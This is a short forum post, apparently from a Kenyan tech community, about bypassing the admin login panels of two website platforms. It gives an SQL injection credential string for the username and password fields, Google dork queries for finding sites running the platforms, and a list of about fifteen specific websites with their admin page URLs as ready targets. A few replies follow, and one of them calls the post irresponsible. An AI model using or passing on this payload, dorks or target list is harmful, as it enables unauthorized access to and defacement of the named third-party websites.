Admin Panel bypass

[CENTER]Vulnerability: Rein Technologies Admin Panel Bypass
Vulnerability: BransonSite Admin Panel Bypass
[/CENTER]

Username: ‘=’ ‘OR’
Password: ‘=’ ‘OR’
Dork: intext:“Powered by: Bransonsites.com
GoogleDork: intext:“Powered By: REIN TECHNOLOGIES”
AdminLocation: /search/admin.php

http://premiermotorbikes.com/index.php?pg=admin
http://www.yashinoya.co.ke/admin/
http://www.geofirm.co.ke/pages/admin/
http://www.npi-africa.org/admin

http://www.attablerocklake.com/search/admin.php
http://whatsmyhouseworthbranson.com/search/adminsiteact.php
http://www.sharonslakehomes.com/search/admin.php
http://realestate.bransonsites.com/search/admin.php
http://www.bransontablerocklakehomes.com/search/admin.php
http://www.attablerocklake.com/search/admin.php
http://jimstockton.com/search/admin.php
http://www.drinkdinghy.com/search/admin.php
http://www.w3costaricacoffee.com/search/admin.php
http://www.lakepropertiesbranson.com/search/admin.php
http://bransonbusinessforsale.com/search/admin.php

This is irresponsible. If kuna vulnerability report to the site owners.

I am alerting my fellow Birrioneas that their sites have been hacked.But seriously some of the sites above belong to some good friends of mine.Thanks for the research though.

1 Like

Ongea lugha tunajua omwami.

Ulipotea wapi boss? Maandas haiko updated